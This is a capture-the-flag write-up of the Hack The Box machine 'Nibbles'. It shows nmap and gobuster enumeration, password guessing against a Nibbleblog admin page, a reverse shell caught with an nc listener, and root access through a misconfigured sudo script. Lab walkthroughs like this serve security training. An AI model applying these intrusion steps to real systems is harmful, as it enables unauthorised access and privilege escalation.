← Home

Hack The Box : Nibbles

20 July, 2021

Beginning with an nmap scan

# nmap -A -sC -sV -O 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 11:46 EDT
Nmap scan report for 10.10.10.75
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/20%OT=22%CT=1%CU=37505%PV=Y%DS=2%DC=T%G=Y%TM=60F6F00
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   301.34 ms 10.10.16.1
2   151.76 ms 10.10.10.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds

Port 80 served a page with a helpful hint

# curl 10.10.10.75
<b>Hello world!</b>














<!-- /nibbleblog/ directory. Nothing interesting here! -->

The path lead to a Nibbleblog instance. I couldn't find any valuable information on the blog itself, so I ran gobuster on the path

# ./gobuster dir -r -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.75/nibbleblog/ -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 401] 
/content              (Status: 200) [Size: 1353]
/themes               (Status: 200) [Size: 1741]
/feed.php             (Status: 200) [Size: 300] 
/admin                (Status: 200) [Size: 2127]
/admin.php            (Status: 200) [Size: 1401]
/plugins              (Status: 200) [Size: 3777]
/install.php          (Status: 200) [Size: 78]  
/update.php           (Status: 200) [Size: 1622]
/README               (Status: 200) [Size: 4628]
/languages            (Status: 200) [Size: 3167]

So there is an admin login page at admin.php... but I don't have any credentials yet.

The README indicated that the nibbleblog version was 4.0.3

# curl 10.10.10.75/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

I couldn't find any other information so I focussed on finding the admin credentials. Browsing the directories from the gobuster output I found that the admin username is admin

# curl http://10.10.10.75/nibbleblog/content/private/users.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users><user username="admin"><id type="integer">0</id>

I created a very small wordlist using the homepage using cewl and tried to bruteforce the password, turns out the admin password was nibbles

Using this exploit guide, I was able to upload a reverse shell

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.75] 43538
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 12:46:55 up  1:44,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
$ whoami
nibbler

nibbler had the user flag in it's home directory

$ pwd
/
$ cd /home
$ ls
nibbler
$ cd nibbler
$ ls -ltrha
total 24K
drwxr-xr-x 3 root    root    4.0K Dec 10  2017 ..
drwxr-xr-x 3 nibbler nibbler 4.0K Dec 10  2017 personal
drwxrwxr-x 2 nibbler nibbler 4.0K Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1.9K Dec 10  2017 personal.zip
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
-r-------- 1 nibbler nibbler   33 Jul 20 11:03 user.txt
drwxr-xr-x 4 nibbler nibbler 4.0K Jul 20 12:01 .
$ cat user.txt
<flag>

Exploring around, sudo -l revealed a script that nibbler could run as root

$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
$ cat ~/personal/stuff/monitor.sh
su
$ sudo /home/nibbler/personal/stuff/monitor.sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls -ltrha
total 32K
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4.0K Dec 10  2017 .nano
drwx------  2 root root 4.0K Dec 10  2017 .cache
-rw-------  1 root root    0 Dec 29  2017 .bash_history
-rw-------  1 root root 1.1K Dec 15  2020 .viminfo
drwx------  4 root root 4.0K Dec 15  2020 .
drwxr-xr-x 23 root root 4.0K Dec 15  2020 ..
-r--------  1 root root   33 Jul 20 11:03 root.txt
cat root.txt
<flag>